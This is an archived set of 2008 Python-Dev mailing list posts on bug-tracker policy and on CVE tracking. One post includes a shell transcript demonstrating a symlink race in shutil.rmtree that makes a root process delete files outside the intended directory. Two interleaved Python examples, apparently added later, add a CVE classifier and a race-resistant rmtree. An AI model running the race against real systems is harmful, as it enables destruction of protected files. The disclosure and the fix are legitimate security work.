Re: [Python-Dev] Summary of Python tracker Issues

2008-11-24 Thread Martin v. Löwis
>> Correct.
> 
> If a bug exists and is fixed in a later release -- I would call it 'out
> of date' instead.

Hmm. You have a point, but it should be "Fixed" then, and we have indeed
closed bug reports as "fixed" if later releases fixed the bug.

It probably doesn't really matter - if the complaint was specifically
that the bug is in 2.4.x, with a request to fix it in 2.4.x+1, then
it's "won't fix".

Regards,
Martin
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Summary of Python tracker Issues

2008-11-24 Thread Terry Reedy

Martin v. Löwis wrote:
> Jeremy Hylton wrote:
>> I wanted to ask a policy question on the bug tracker.  What are we
>> doing with bugs filed against Python 2.4?
>> This bug http://bugs.python.org/issue1208304 reports a fd leak in
>> Python 2.4, which doesn't exist in the head.  Since Python 2.4 is in
>> security-fix only mode, is it fair to close this with a won't fix?
>
> Correct.

If a bug exists and is fixed in a later release -- I would call it 'out
of date' instead.




Re: [Python-Dev] Summary of Python tracker Issues

2008-11-24 Thread Martin v. Löwis
Jeremy Hylton wrote:
> I wanted to ask a policy question on the bug tracker.  What are we
> doing with bugs filed against Python 2.4?
> This bug http://bugs.python.org/issue1208304 reports a fd leak in
> Python 2.4, which doesn't exist in the head.  Since Python 2.4 is in
> security-fix only mode, is it fair to close this with a won't fix?

Correct.

Regards,
Martin



Re: [Python-Dev] CVE tracking

2008-11-24 Thread Brett Cannon
On Mon, Nov 24, 2008 at 10:43, Mart Somermaa <[EMAIL PROTECTED]> wrote:
>> When I looked through that list a week or so ago, I noticed that some
>> issues were obviously related to the Python distribution itself, but others
>> appeared to be Python application problems.
>
> I looked through the list now and weeded out irrelevant CVEs (by putting
> them into
> the ignore list in the script).
> Also, now the output has descriptions of the CVEs as well, so it's more
> readable.
>
> Improved output: http://dpaste.com/hold/93386/
> Improved script (with a proper IGNORED_LIST): http://dpaste.com/hold/93388/
>
> The results are much better:
> 5 OK's, 8 WARNings, 7 ERRORs.
>
> Most of the errors are from 2007 or before, the only error from 2008 is an
> obscure Tools/faqwiz/move-faqwiz.sh-related one.
>

Thanks for doing this, Mart! But I know that at least for me I won't
be able to look at the list until some time after 3.0 is released. And
I suspect I am not the only member of the PSRT that this will be true
for.

If anyone wants to toss this list up on the wiki and go through to
help figure out what is needed for each (and either update the CVE as
needed or file an issue on the bug tracker mentioning the CVE; bonus
if you fix it as well) that would be helpful.

-Brett


[Python-Dev] CVE tracking

2008-11-24 Thread Mart Somermaa
> When I looked through that list a week or so ago, I noticed that some
> issues were obviously related to the Python distribution itself, but
> others appeared to be Python application problems.

I looked through the list now and weeded out irrelevant CVEs (by putting
them into the ignore list in the script).
Also, now the output has descriptions of the CVEs as well, so it's more
readable.

Improved output: http://dpaste.com/hold/93386/
Improved script (with a proper IGNORED_LIST): http://dpaste.com/hold/93388/

The results are much better:
5 OK's, 8 WARNings, 7 ERRORs.

Most of the errors are from 2007 or before, the only error from 2008 is an
obscure Tools/faqwiz/move-faqwiz.sh-related one.

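The classification Mart's script performs, written out as an added example (it is not Mart's dpaste script nor any other code posted in the thread): each CVE is matched forward against bugs.python.org issue URLs in its references, each tracker issue is matched backward for CVE ids in its text, and the CVE lands in ok / warning / error or the ignore list. It goes slightly beyond the post by also listing, per CVE, the missing link in either direction that a human would have to add to make the references symmetric. The CVE ids, issue numbers, URLs and descriptions in the sample data are constructed for the example and do not refer to real entries.

```python
import re
from dataclasses import dataclass

CVE_ID = re.compile(r"CVE-\d{4}-\d{4,}")
TRACKER_ISSUE = re.compile(r"https?://bugs\.python\.org/issue(\d+)")
SVN_REF = re.compile(r"https?://svn\.python\.org/")


@dataclass
class CVEEntry:
    cve_id: str
    description: str
    references: tuple  # URLs listed on the CVE page


@dataclass
class TrackerIssue:
    number: int
    text: str          # title plus messages, as one blob of text


def classify(cves, issues, ignored=frozenset()):
    """Three-way classification from the post, plus the asymmetric links.

    ok      -- the CVE references a bugs.python.org issue
    warning -- the CVE references only an SVN revision, or an issue mentions
               the CVE id while the CVE does not link back to the issue
    error   -- no reference in either direction
    CVE ids in `ignored` (the script's IGNORED_LIST) are reported separately.
    """
    # backward direction: which issues mention which CVE id
    back = {}
    for issue in issues:
        for cid in set(CVE_ID.findall(issue.text)):
            back.setdefault(cid, set()).add(issue.number)

    report = {}
    for cve in cves:
        if cve.cve_id in ignored:
            report[cve.cve_id] = {"status": "ignored", "forward": [], "back": [], "todo": []}
            continue
        forward = {int(n) for ref in cve.references for n in TRACKER_ISSUE.findall(ref)}
        has_svn = any(SVN_REF.match(ref) for ref in cve.references)
        back_refs = back.get(cve.cve_id, set())
        if forward:
            status = "ok"
        elif has_svn or back_refs:
            status = "warning"
        else:
            status = "error"
        # what a human would have to add so that the references become symmetric
        todo = [f"issue{n} should mention {cve.cve_id}" for n in sorted(forward - back_refs)]
        todo += [f"{cve.cve_id} should reference issue{n}" for n in sorted(back_refs - forward)]
        report[cve.cve_id] = {"status": status, "forward": sorted(forward),
                              "back": sorted(back_refs), "todo": todo}
    return report


def counts(report):
    """Totals in the shape of the post's 'N OK's, N WARNings, N ERRORs' line."""
    out = {"ok": 0, "warning": 0, "error": 0, "ignored": 0}
    for entry in report.values():
        out[entry["status"]] += 1
    return out


# Constructed sample data: these CVE ids, issue numbers, URLs and descriptions
# are made up for the example and do not refer to real entries.
SAMPLE_CVES = [
    CVEEntry("CVE-2008-9001", "buffer overflow in a C extension",
             ("http://bugs.python.org/issue90001",)),
    CVEEntry("CVE-2008-9002", "integer overflow in a codec",
             ("http://svn.python.org/view?view=rev&rev=90002",)),
    CVEEntry("CVE-2008-9003", "symlink race in a cleanup helper", ()),
    CVEEntry("CVE-2008-9004", "crash in a third-party web app written in Python",
             ("http://vendor.example/advisory",)),
    CVEEntry("CVE-2008-9005", "unrelated application bug", ()),
]
SAMPLE_ISSUES = [
    TrackerIssue(90001, "Fix overflow; see CVE-2008-9001"),
    TrackerIssue(90003, "rmtree follows symlinks (CVE-2008-9003)"),
    TrackerIssue(90006, "typo in docs"),
]
IGNORED_LIST = frozenset({"CVE-2008-9005"})


if __name__ == "__main__":
    rep = classify(SAMPLE_CVES, SAMPLE_ISSUES, IGNORED_LIST)
    for cid, entry in rep.items():
        print(cid, entry["status"], "; ".join(entry["todo"]))
    print(counts(rep))
```

With the sample data, `counts()` gives one ok, two warnings, one error and one ignored; the `todo` entry for CVE-2008-9003 is the "CVE should really be updated to link to the issue" case from the post, and an ok CVE whose issue never mentions the CVE id would show up with the opposite entry.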


Re: [Python-Dev] Summary of Python tracker Issues

2008-11-24 Thread Brett Cannon
On Mon, Nov 24, 2008 at 10:02, Jeremy Hylton <[EMAIL PROTECTED]> wrote:
> On Mon, Nov 24, 2008 at 12:54 PM, Brett Cannon <[EMAIL PROTECTED]> wrote:
>> On Mon, Nov 24, 2008 at 08:58, Jeremy Hylton <[EMAIL PROTECTED]> wrote:
>>> I wanted to ask a policy question on the bug tracker.  What are we
>>> doing with bugs filed against Python 2.4?
>>> This bug http://bugs.python.org/issue1208304 reports a fd leak in
>>> Python 2.4, which doesn't exist in the head.  Since Python 2.4 is in
>>> security-fix only mode, is it fair to close this with a won't fix?
>>>
>>
>> I think so.
>>
>>> A meta-question:  Is there a document that has any tips on how to
>>> handle bug reports?  It might be helpful to have a list of hints or
>>> policy decisions to help people decide what to do with bugs.
>>
>> It's coming. I just have not gotten around to it yet. I plan to
>> outline the basic steps in the life of an issue and that includes
>> closing an issue and the various reasons this can happen.
>
> If you put up a skeleton doc, I can add a note to this effect.
>

The doc I have for it is made up of like five bullet points, so nothing
to really put up yet. But I did add another bullet point for this.

-Brett


> Jeremy
>
>>
>> -Brett
>>
>>
>>>
>>> Jeremy
>>>

Re: [Python-Dev] Summary of Python tracker Issues

2008-11-24 Thread Jeremy Hylton
On Mon, Nov 24, 2008 at 12:54 PM, Brett Cannon <[EMAIL PROTECTED]> wrote:
> On Mon, Nov 24, 2008 at 08:58, Jeremy Hylton <[EMAIL PROTECTED]> wrote:
>> I wanted to ask a policy question on the bug tracker.  What are we
>> doing with bugs filed against Python 2.4?
>> This bug http://bugs.python.org/issue1208304 reports a fd leak in
>> Python 2.4, which doesn't exist in the head.  Since Python 2.4 is in
>> security-fix only mode, is it fair to close this with a won't fix?
>>
>
> I think so.
>
>> A meta-question:  Is there a document that has any tips on how to
>> handle bug reports?  It might be helpful to have a list of hints or
>> policy decisions to help people decide what to do with bugs.
>
> It's coming. I just have not gotten around to it yet. I plan to
> outline the basic steps in the life of an issue and that includes
> closing an issue and the various reasons this can happen.

If you put up a skeleton doc, I can add a note to this effect.

Jeremy

>
> -Brett
>
>
>>
>> Jeremy
>>

Re: [Python-Dev] Summary of Python tracker Issues

2008-11-24 Thread Brett Cannon
On Mon, Nov 24, 2008 at 08:58, Jeremy Hylton <[EMAIL PROTECTED]> wrote:
> I wanted to ask a policy question on the bug tracker.  What are we
> doing with bugs filed against Python 2.4?
> This bug http://bugs.python.org/issue1208304 reports a fd leak in
> Python 2.4, which doesn't exist in the head.  Since Python 2.4 is in
> security-fix only mode, is it fair to close this with a won't fix?
>

I think so.

> A meta-question:  Is there a document that has any tips on how to
> handle bug reports?  It might be helpful to have a list of hints or
> policy decisions to help people decide what to do with bugs.

It's coming. I just have not gotten around to it yet. I plan to
outline the basic steps in the life of an issue and that includes
closing an issue and the various reasons this can happen.

-Brett


>
> Jeremy
>

Re: [Python-Dev] Summary of Python tracker Issues

2008-11-24 Thread Jeremy Hylton
I wanted to ask a policy question on the bug tracker.  What are we
doing with bugs filed against Python 2.4?
This bug http://bugs.python.org/issue1208304 reports a fd leak in
Python 2.4, which doesn't exist in the head.  Since Python 2.4 is in
security-fix only mode, is it fair to close this with a won't fix?

A meta-question:  Is there a document that has any tips on how to
handle bug reports?  It might be helpful to have a list of hints or
policy decisions to help people decide what to do with bugs.

Jeremy

On Fri, Nov 21, 2008 at 12:06 PM, Python tracker <[EMAIL PROTECTED]> wrote:
>
> ACTIVITY SUMMARY (11/14/08 - 11/21/08)
> Python tracker at http://bugs.python.org/
>
> To view or respond to any of the issues listed below, click on the issue
> number.  Do NOT respond to this message.
>
>  2194 open (+35) / 14007 closed (+18) / 16201 total (+53)
>
> Open issues with patches:   728
>
> Average duration of open issues: 712 days.
> Median duration of open issues: 2043 days.
>
> Open Issues Breakdown
>    open  2177 (+35)
> pending    17 ( +0)
>
> Issues Created Or Reopened (56)
> ___
>
> Tkinter binding involving Control-spacebar raises unicode error  11/18/08
>        http://bugs.python.org/issue1028  reopened  ocean-city
>        patch
>
> Byte/string inconsistencies between different dbm modules        11/21/08
>        http://bugs.python.org/issue3799  reopened  brett.cannon
>        patch, needs review
>
> type of UserList instance returns class instead of instance      11/14/08
> CLOSED http://bugs.python.org/issue4326  created   chafporte
>
> Patch: simplify complex constant assignment statements           11/14/08
>        http://bugs.python.org/issue4327  created   novalis_dt
>        patch
>
> "à" in u"foo" raises a misleading error                          11/15/08
>        http://bugs.python.org/issue4328  created   ezio.melotti
>
> base64 does not properly handle unicode strings                  11/15/08
>        http://bugs.python.org/issue4329  created   mbecker
>
> wsgiref.validate doesn't accept arguments to readline            11/16/08
> CLOSED http://bugs.python.org/issue4330  created   ianb
>
> Can't use _functools.partial() created function as method        11/16/08
>        http://bugs.python.org/issue4331  created   ssadler
>
> asyncore.file_dispatcher does not use dup()'ed fd                11/17/08
> CLOSED http://bugs.python.org/issue4332  created   christianbecke
>        patch
>
> Reworked Dialog.py                                               11/17/08
>        http://bugs.python.org/issue4333  created   gpolo
>        patch
>
> Mac Build Script is broken for 2.6 release                       11/17/08
> CLOSED http://bugs.python.org/issue4334  created   ngift
>
> inspect.getsourcelines ignores last line in module               11/17/08
>        http://bugs.python.org/issue4335  created   RafeSacks
>
> Fix performance issues in xmlrpclib                              11/17/08
>        http://bugs.python.org/issue4336  created   krisvale
>        patch, patch, easy
>
> Iteration over a map object with list()                          11/17/08
> CLOSED http://bugs.python.org/issue4337  created   jmfauth
>
> TypeError (bytes/str) in distutils command "upload"              11/17/08
> CLOSED http://bugs.python.org/issue4338  created   hagen
>        patch
>
> Fix set-like dictview doc                                        11/17/08
> CLOSED http://bugs.python.org/issue4339  created   tjreedy
>
> xmlrpc.client - default 'SlowParser' not defined                 11/17/08
>        http://bugs.python.org/issue4340  created   mwatkins
>
> Update __hash__ doc                                              11/17/08
> CLOSED http://bugs.python.org/issue4341  created   tjreedy
>
> (Tkinter) Please backport these                                  11/18/08
>        http://bugs.python.org/issue4342  created   gpolo
>
> New function in Tkinter.py: setup_master                         11/18/08
>        http://bugs.python.org/issue4343  created   gpolo
>        patch
>
> crash upon launch                                                11/18/08
> CLOSED http://bugs.python.org/issue4344  created   source.mod
>
> Implement nb_nonzero for PyTclObject                             11/18/08
>        http://bugs.python.org/issue4345  created   gpolo
>        patch
>
> PyObject_CallMethod changes the exception message already set by 11/18/08
>        http://bugs.python.org/issue4346  created   gpolo
>        patch
>
> Dependencies of graminit.h are not rebuilt when the file is rege 11/18/08
>        http://bugs.python.org/issue4347  created   thomas.lee
>        patch
>
> bytearray methods returning self                                 11/18/08
> CLOSED http://bugs.python.org/issue4348  created   DinoV
>        patch, needs review
>
> sys.path includes extraneous junk                                11/18/08
> CLOSED http://bugs.python.org/issue4349  created   ex

Re: [Python-Dev] CVE tracking

2008-11-24 Thread Terry Reedy

Mart Somermaa wrote:
> I created a script that parses the
> http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=python
> Python-related CVE list and classifies the CVEs as follows:
>
> * "ok" -- CVE has references to bugs.python.org
>
> * "warnings" -- CVE has references to Python SVN revisions
>   or an issue in bugs.python.org refers to it (i.e. the problem is
>   probably fixed, but the CVE should really be updated to link
>   to the issue that is probably listed in bugs.python.org)
>
> * "errors" -- CVE has no references to Python issues or SVN
>   nor does any issue in bugs.python.org have references to the CVE id
>
> The script is at http://dpaste.com/hold/92930/
> The results are at http://dpaste.com/hold/92929/
>
> There were 35 errors, 8 warnings, 5 CVEs were OK.
>
> In an ideal world, the references would be symmetric, i.e. every
> Python-related CVE would have references to one or more issues in
> bugs.python.org and these issues would also refer back to the CVE id.

When I looked through that list a week or so ago, I noticed that some
issues were obviously related to the Python distribution itself, but
others appeared to be Python application problems.  It is not an
'error' for the latter to have no reference to or from bugs.python.org.
I suspect human perusal is needed to make the determination.




[Python-Dev] CVE tracking

2008-11-24 Thread Mart Somermaa

I created a script that parses the
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=python
Python-related CVE list and classifies the CVEs as follows:

* "ok" -- CVE has references to bugs.python.org

* "warnings" -- CVE has references to Python SVN revisions
  or an issue in bugs.python.org refers to it (i.e. the problem is
  probably fixed, but the CVE should really be updated to link
  to the issue that is probably listed in bugs.python.org)

* "errors" -- CVE has no references to Python issues or SVN
  nor does any issue in bugs.python.org have references to the CVE id

The script is at http://dpaste.com/hold/92930/
The results are at http://dpaste.com/hold/92929/

There were 35 errors, 8 warnings, 5 CVEs were OK.

In an ideal world, the references would be symmetric, i.e. every
Python-related CVE would have references to one or more issues in
bugs.python.org and these issues would also refer back to the CVE id.

###

As for the rmtree problem that Gisle Aas raised, this seems to apply
as of Python 2.6:

---

# emulate removing /etc
$ sudo cp -a /etc /root/etc/
$ sudo python2.6
>>> for i in xrange(0, 5):
...     with open("/root/etc/" + str(i), "w") as f:
...         f.write("0")
...
$ ls /root/etc > orig_list.txt

$ mkdir /tmp/attack
$ cp -a /root/etc/* /tmp/attack

$ sudo python2.6
>>> from shutil import rmtree
>>> rmtree('/tmp/attack')
>>> # press ctrl-z to suspend execution
^Z
[1]+  Stopped sudo python2.6

$ mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack
$ fg
sudo python2.6
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/local/lib/python2.6/shutil.py", line 225, in rmtree
    onerror(os.rmdir, path, sys.exc_info())
  File "/usr/local/lib/python2.6/shutil.py", line 223, in rmtree
    os.rmdir(path)
OSError: [Errno 20] Not a directory: '/tmp/attack'

$ ls /root/etc > new_list.txt
$ diff -q orig_list.txt new_list.txt
Files orig_list.txt and new_list.txt differ

---

If the attack weren't possible, the lists would not differ.
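A symlink-race-resistant replacement for the rmtree exercised in the transcript above, as an added example that is not part of Mart's post and not CPython's own shutil code. It assumes a POSIX platform and Python 3.7 or later (the dir_fd parameters of os.open/os.lstat/os.unlink/os.rmdir and fd-based os.scandir); the demo() helper, its temp-directory layout and the "etc"/"attack" names are constructed stand-ins for the post's /root/etc and /tmp/attack. The idea, which Python 3.3 later adopted in shutil.rmtree (exposed as shutil.rmtree.avoids_symlink_attacks), is to never re-resolve a path string: open each directory once with O_NOFOLLOW, verify by device and inode that it is the object lstat() saw, and delete its children by name relative to that descriptor.

```python
import os
import stat
import tempfile

# Assumes a POSIX platform and Python 3.7+ (dir_fd support, fd-based os.scandir).
DIR_FLAGS = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW


def _same_inode(fd, st):
    """True if the open descriptor is the object an earlier lstat() saw."""
    fst = os.fstat(fd)
    return (fst.st_dev, fst.st_ino) == (st.st_dev, st.st_ino)


def _rmtree_fd(dir_fd):
    """Delete everything below the directory open at dir_fd, by name relative to it."""
    with os.scandir(dir_fd) as it:
        entries = list(it)
    for entry in entries:
        if entry.is_dir(follow_symlinks=False):
            st = entry.stat(follow_symlinks=False)  # fstatat(dir_fd, name, NOFOLLOW)
            # O_NOFOLLOW: open fails with ELOOP if the name became a symlink after the stat
            child_fd = os.open(entry.name, DIR_FLAGS, dir_fd=dir_fd)
            try:
                if not _same_inode(child_fd, st):
                    raise OSError(f"{entry.name!r} changed underneath us; aborting")
                _rmtree_fd(child_fd)
            finally:
                os.close(child_fd)
            os.rmdir(entry.name, dir_fd=dir_fd)
        else:
            # files and symlinks alike: unlink the name, never what a link points to
            os.unlink(entry.name, dir_fd=dir_fd)


def safe_rmtree(path):
    """Recursively remove path without ever following a symlink.

    The 2.6 shutil.rmtree in the post re-resolves the path string at every step,
    so swapping a directory for a symlink mid-walk redirects the deletion.  Holding
    a descriptor to each directory and deleting children relative to it (the
    approach Python 3.3's shutil.rmtree later adopted) closes that window.
    """
    parent, name = os.path.split(os.path.abspath(path))
    if not name:
        raise ValueError("refusing to remove the filesystem root")
    parent_fd = os.open(parent, os.O_RDONLY | os.O_DIRECTORY)
    try:
        st = os.lstat(name, dir_fd=parent_fd)
        if not stat.S_ISDIR(st.st_mode):
            # a symlink where a directory was expected: the post's
            # `mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack` swap
            raise NotADirectoryError(f"{path!r} is not a directory (symlink?)")
        fd = os.open(name, DIR_FLAGS, dir_fd=parent_fd)
        try:
            if not _same_inode(fd, st):
                raise OSError(f"{path!r} changed between lstat() and open()")
            _rmtree_fd(fd)
        finally:
            os.close(fd)
        os.rmdir(name, dir_fd=parent_fd)
    finally:
        os.close(parent_fd)


def demo():
    """Re-create the post's scenario in a temp dir (constructed stand-ins for
    /root/etc and /tmp/attack, plus a symlink planted inside the victim tree)
    and report what survived."""
    base = tempfile.mkdtemp()
    protected = os.path.join(base, "etc")          # must not lose these files
    os.mkdir(protected)
    for i in range(5):
        with open(os.path.join(protected, str(i)), "w") as f:
            f.write("0")
    expected = [str(i) for i in range(5)]
    victim = os.path.join(base, "attack")          # the tree we want gone
    os.makedirs(os.path.join(victim, "sub"))
    open(os.path.join(victim, "sub", "file"), "w").close()
    os.symlink(protected, os.path.join(victim, "link"))

    result = {}
    safe_rmtree(victim)
    result["victim_removed"] = not os.path.lexists(victim)
    result["protected_intact"] = sorted(os.listdir(protected)) == expected

    # the post's swap: the victim root itself is now a symlink to the target
    os.symlink(protected, victim)
    try:
        safe_rmtree(victim)
        result["swapped_root_refused"] = False
    except NotADirectoryError:
        result["swapped_root_refused"] = True
    result["protected_intact_after_swap"] = sorted(os.listdir(protected)) == expected

    os.unlink(victim)  # drop the symlink, then clean up the whole temp area
    safe_rmtree(base)
    return result
```

Run `demo()` and all four flags come back true: the victim tree is gone, the symlink planted inside it is unlinked rather than followed, and the swap from the post fails at the first lstat() with NotADirectoryError instead of emptying the target. A swap that lands between the lstat() and the open() is caught by O_NOFOLLOW (ELOOP) or by the st_dev/st_ino comparison; a swap of an ancestor after open() succeeded cannot redirect anything either, because every unlink and rmdir is issued relative to a descriptor already held.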